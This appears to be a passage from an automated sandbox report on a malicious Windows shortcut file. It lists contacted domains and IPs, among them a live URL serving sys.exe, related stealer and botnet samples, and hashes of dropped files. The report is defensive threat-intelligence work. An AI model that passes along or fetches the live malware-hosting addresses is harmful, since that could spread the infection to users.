                    https://fermazapoved.ru/images/sys.exe0%Avira URL Cloudsafe
                    http://www.codeplex.com/DotNetZip0%Avira URL Cloudsafe

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    fermazapoved.ru
                    		62.173.145.78
                    		truetrue
                      		unknown
                      174.109.0.0.in-addr.arpa
                      		unknown
                      		unknowntrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://fermazapoved.ru/images/sys.exetrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://fermazapoved.ru/images/sys.exefalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://fermazapoved.rupowershell.exe, 00000000.00000002.1746913988.000001F3D9527000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9522000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9541000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1746913988.000001F3D9079000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://fermazapoved.rupowershell.exe, 00000000.00000002.1746913988.000001F3D9527000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/chrome_newtabsvhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDFDjqfxpxi.tmpdb.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1746913988.000001F3D98E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E7F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E80C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://duckduckgo.com/ac/?q=svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://stackoverflow.com/q/14436606/23354svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://github.com/mgravell/protobuf-netJsvhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icosvhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://go.micropowershell.exe, 00000000.00000002.1746913988.000001F3D9079000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182021D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.microsoft.copowershell.exe, 00000000.00000002.1770301966.000001F3F0130000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Iconpowershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://github.com/mgravell/protobuf-netsvhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://crl.rootca1.amazontrust.com/rootca1.crl0cert9.db.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://ocsp.rootca1.amazontrust.com0:cert9.db.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17svhosts.exe, 00000002.00000002.2067954735.00000000027A1000.00000004.00000800.00020000.00000000.sdmp, Zgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.ecosia.org/newtab/svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brDjqfxpxi.tmpdb.2.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://github.com/Pester/Pesterpowershell.exe, 00000006.00000002.2202470656.00000182017D1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://ac.ecosia.org/autocomplete?q=svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://github.com/mgravell/protobuf-netisvhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://x1.c.lencr.org/0cert9.db.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://x1.i.lencr.org/0cert9.db.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://stackoverflow.com/q/11564914/23354;svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://stackoverflow.com/q/2152978/23354svhosts.exe, 00000002.00000002.2067305489.0000000000F70000.00000004.08000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallZgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchsvhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1746913988.000001F3D98E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E7F85000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1766056749.000001F3E80C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211613000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2383269147.0000018211755000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://crt.rootca1.amazontrust.com/rootca1.cer0?cert9.db.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.codeplex.com/DotNetZipsvhosts.exe, 00000002.00000002.2290132290.000000001C350000.00000004.08000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://aka.ms/pscore68powershell.exe, 00000000.00000002.1746913988.000001F3D7F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182015A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.mozilla.orgDjqfxpxi.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016ExamplesZgsqkqrt.tmpdb.2.dr, Erwtzpbb.tmpdb.2.dr, Oibwdoubon.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1746913988.000001F3D7F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2202470656.00000182015A1000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=svhosts.exe, 00000002.00000002.2080861370.0000000012A6E000.00000004.00000800.00020000.00000000.sdmp, svhosts.exe, 00000002.00000002.2080861370.0000000012A65000.00000004.00000800.00020000.00000000.sdmp, Sqyigxtxbzu.tmpdb.2.dr, Dtrqif.tmpdb.2.dr, Tmlwihiyhr.tmpdb.2.drfalse
                        • URL Reputation: safe
                        		unknown

                        World Map of Contacted IPs

                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs

                        Public IPs

                        IPDomainCountryFlagASNASN NameMalicious
                        188.130.138.23
                        		unknownRussian Federation
                        		204490ASKONTELRUtrue
                        62.173.145.78
                        		fermazapoved.ruRussian Federation
                        		34300SPACENET-ASInternetServiceProviderRUtrue

                        General Information

                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1493062
                        Start date and time:2024-08-14 22:22:47 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 9m 17s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:10
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:Inovice_3_ETH.lnk
                        Detection:MAL
                        Classification:mal100.troj.spyw.evad.winLNK@7/29@2/2
                        EGA Information:
                        • Successful, ratio: 33.3%
                        HCA Information:Failed
                        Cookbook Comments:
                        • Found application associated with file extension: .lnk
                        • Override analysis time to 240s for sample based on specific behavior

                        Warnings

                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Execution Graph export aborted for target powershell.exe, PID 7332 because it is empty
                        • Execution Graph export aborted for target powershell.exe, PID 7976 because it is empty
                        • Not all processes where analyzed, report is missing behavior information
                        • Report size exceeded maximum capacity and may have missing behavior information.
                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                        • Report size getting too big, too many NtCreateFile calls found.
                        • Report size getting too big, too many NtOpenFile calls found.
                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                        • Report size getting too big, too many NtQueryAttributesFile calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                        • VT rate limit hit for: Inovice_3_ETH.lnk

                        Simulations

                        Behavior and APIs

                        TimeTypeDescription
                        16:23:40API Interceptor87x Sleep call for process: powershell.exe modified

                        Joe Sandbox View / Context

                        IPs

                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        188.130.138.23123.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                          HYQjvgw17m.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                            Scrin_oplati_08.08.2024.jpg.scr.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                              x7myVfh5YS.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                62.173.145.78x7myVfh5YS.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • fermazapoved.ru/images/h.exe

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                fermazapoved.rux7myVfh5YS.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • 62.173.145.78

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                SPACENET-ASInternetServiceProviderRUx86.elfGet hashmaliciousMiraiBrowse
                                • 176.120.80.41
                                x7myVfh5YS.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • 62.173.145.78
                                KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                • 62.173.159.169
                                FcMd5XxxZ0.elfGet hashmaliciousMiraiBrowse
                                • 176.120.81.210
                                dvrLocker.elfGet hashmaliciousUnknownBrowse
                                • 176.120.80.56
                                om4SVF6n0I.elfGet hashmaliciousMiraiBrowse
                                • 176.120.80.91
                                muAZlKU0hq.elfGet hashmaliciousMiraiBrowse
                                • 62.173.159.122
                                sQSqM58mvl.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                • 176.120.79.55
                                w2wnAQTd6O.elfGet hashmaliciousUnknownBrowse
                                • 176.120.80.97
                                SecuriteInfo.com.Win32.TrojanX-gen.1033.1898.exeGet hashmaliciousAmadey, Mars Stealer, PureLog Stealer, RisePro Stealer, SmokeLoader, Stealc, VidarBrowse
                                • 176.120.64.84
                                ASKONTELRU123.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • 188.130.138.23
                                HYQjvgw17m.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • 188.130.138.23
                                Scrin_oplati_08.08.2024.jpg.scr.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • 188.130.138.23
                                x7myVfh5YS.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                • 188.130.138.23
                                usdt flash sender 2.exeGet hashmaliciousRedLineBrowse
                                • 109.248.201.180
                                https://toponline.business/exomkvGet hashmaliciousHTMLPhisherBrowse
                                • 46.8.210.233
                                https://signup.primedatecom.pro/signupGet hashmaliciousPhisherBrowse
                                • 46.8.19.194
                                IMG001.exeGet hashmaliciousXmrigBrowse
                                • 46.8.19.60
                                https://drive.google.com/file/d/1e7FGpRopAR3P7JYJwPPalZPEg_iK8VLOGet hashmaliciousUnknownBrowse
                                • 188.130.138.176
                                YTeU5j9j5i.elfGet hashmaliciousUnknownBrowse
                                • 46.8.19.29

                                JA3 Fingerprints

                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                3b5074b1b5d032e5620f69f9f700ff0ehttp://postuser.infoGet hashmaliciousUnknownBrowse
                                • 62.173.145.78
                                https://professionalprojectmanagementpro.benchurl.com/c/l?u=116E33D3&e=188D7F3&c=167E3A&t=0&l=108F0FCB5&email=kVZdtuK%2FWFCzmtjGcu30tMObv%2BTy5rLraMk9iWbyXew%3D&seq=1Get hashmaliciousUnknownBrowse
                                • 62.173.145.78
                                https://hqmvss08.r.us-east-2.awstrack.me/L0/https:%2F%2F%256f%2566%2566%2569%2563%2565%252e%2570%256c%2561%2573%2574%2569%2567%256c%256f%2562%256f%2573%252e%2563%256f%256d%252emx/1/010f019151e19ed5-70a724dc-ec04-4975-8706-d3f06d5347ba-000000/1NfJf6PsvaeAekHt1-XcPrdCw3M=172Get hashmaliciousHTMLPhisherBrowse
                                • 62.173.145.78
                                https://pariscope.com.au/robots.html?colors=YmxhbmdlQGplZmZwYXJpc2gubmV0Get hashmaliciousHTMLPhisher, Tycoon2FABrowse
                                • 62.173.145.78
                                SecuriteInfo.com.Trojan.PackedNET.3020.11631.31643.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                • 62.173.145.78
                                Document.exeGet hashmaliciousVIP KeyloggerBrowse
                                • 62.173.145.78
                                SecuriteInfo.com.Trojan.PackedNET.3020.22248.26000.exeGet hashmaliciousMassLogger RAT, PureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                • 62.173.145.78
                                Dhl_air_waybill_shipping_documents_original_BL_CI&PL_13_08_2024_00000000_doc.vbsGet hashmaliciousGuLoaderBrowse
                                • 62.173.145.78
                                SC_TR116709004.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                • 62.173.145.78
                                IMPORT PO2024-0961 ASTG.exeGet hashmaliciousAgentTesla, DarkTortillaBrowse
                                • 62.173.145.78

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svhosts.exe.log

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1588
                                Entropy (8bit):5.361611429115807
                                Encrypted:false
                                SSDEEP:48:MxHKQwYHKGSI6oRAHKKkt1qHGIsJHNpYHKCtHTH+JHj:iqbYqGSI6ouqKktwmjJtpYqCtzHID
                                MD5:5FBD87AF3EB86E4729D8DF50FE71840E
                                SHA1:D1C553E49838562675EDE75A2FD971392D6C2475
                                SHA-256:125094A72CA8ED272159760BDF9B815F0F7A35898CE78B305E63B6EE5ECF7DD7
                                SHA-512:1F8E98E55236480C7968B0AFE574C9A6B8A94C1A734A1E709F1BE93327C119046AE060E56DC4E2FF693ED838C95EC4576D60010AE2C46FC9D353CF6D23B4E2F0
                                Malicious:false
                                Reputation:low
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Management, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\8af759007c012da6

                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                Download File
                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):64
                                Entropy (8bit):0.34726597513537405
                                Encrypted:false
                                SSDEEP:3:Nlll:Nll
                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:@...e...........................................................

                                C:\Users\user\AppData\Local\Temp\Cwvfkwp.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):114688
                                Entropy (8bit):0.9746603542602881
                                Encrypted:false
                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Djqfxpxi.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):5242880
                                Entropy (8bit):0.037963276276857943
                                Encrypted:false
                                SSDEEP:192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
                                MD5:C0FDF21AE11A6D1FA1201D502614B622
                                SHA1:11724034A1CC915B061316A96E79E9DA6A00ADE8
                                SHA-256:FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
                                SHA-512:A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
                                Malicious:false
                                Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Dtrqif.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                Category:dropped
                                Size (bytes):106496
                                Entropy (8bit):1.1358696453229276
                                Encrypted:false
                                SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                MD5:28591AA4E12D1C4FC761BE7C0A468622
                                SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                Malicious:false
                                Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Ednefnfbt.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                Category:dropped
                                Size (bytes):126976
                                Entropy (8bit):0.47147045728725767
                                Encrypted:false
                                SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Eibdovv.tmp

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                Category:dropped
                                Size (bytes):28672
                                Entropy (8bit):2.5793180405395284
                                Encrypted:false
                                SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                Malicious:false
                                Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\Users\user\AppData\Local\Temp\Eqnllogrj.tmpdb

                                Download File
                                Process:C:\Users\user\AppData\Roaming\svhosts.exe
                                File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                Category:dropped
                                Size (bytes):40960
                                Entropy (8bit):0.8553638852307782
                                Encrypted:false
                                SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                MD5:28222628A3465C5F0D4B28F70F97F482
                                SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
